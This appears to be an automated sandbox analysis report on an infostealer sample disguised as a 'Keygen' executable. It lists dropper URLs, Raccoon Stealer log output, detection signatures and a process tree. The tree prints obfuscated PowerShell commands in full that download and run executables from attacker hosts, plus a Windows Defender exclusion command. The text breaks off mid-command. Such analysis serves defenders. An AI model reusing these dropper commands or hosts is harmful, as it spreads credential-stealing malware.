Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    62s
  • max time network
    142s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (130) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 01:32:19 GMT Bot_ID: 18823CA4-5761-4226-8787-CF36135F1C68_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: LZUKLIOU - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (829 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 4 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 18 IoCs
  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (130) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (130) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3096
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F572.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (130) — ?????.exe""
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2636
      • C:\Users\Admin\AppData\Local\Temp\F572.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:3868
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F572.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3336
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1908
          • C:\Users\Public\uex.exe
            "C:\Users\Public\uex.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4900
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:4988
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:5084
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 5084 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\616396053715282\\* & exit
                  8⤵
                    PID:4568
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 5084
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2748
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:5016
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4200
              • C:\Users\Public\uex.exe
                "C:\Users\Public\uex.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                PID:5072
                • C:\Users\Admin\AppData\Local\Temp\G1j978l7PU.exe
                  "C:\Users\Admin\AppData\Local\Temp\G1j978l7PU.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4220
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\G1j978l7PU.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:192
                • C:\Users\Admin\AppData\Local\Temp\zHoU6TyGIq.exe
                  "C:\Users\Admin\AppData\Local\Temp\zHoU6TyGIq.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:3988
                • C:\Users\Admin\AppData\Local\Temp\0Wpe9Rcn9A.exe
                  "C:\Users\Admin\AppData\Local\Temp\0Wpe9Rcn9A.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:4020
                  • \??\c:\windows\SysWOW64\cmstp.exe
                    "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\kh2f00bv.inf
                    8⤵
                      PID:4452
                  • C:\Users\Admin\AppData\Local\Temp\yHo9mCbfnN.exe
                    "C:\Users\Admin\AppData\Local\Temp\yHo9mCbfnN.exe"
                    7⤵
                    • Executes dropped EXE
                    • Windows security modification
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4996
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "powershell" Get-MpPreference -verbose
                      8⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4620
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\uex.exe"
                    7⤵
                      PID:3468
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /T 10 /NOBREAK
                        8⤵
                        • Delays execution with timeout.exe
                        PID:5100
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F572.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3592
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:992
            • C:\Windows\SysWOW64\timeout.exe
              timeout 1
              3⤵
              • Delays execution with timeout.exe
              PID:3328
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F572.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3452
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = 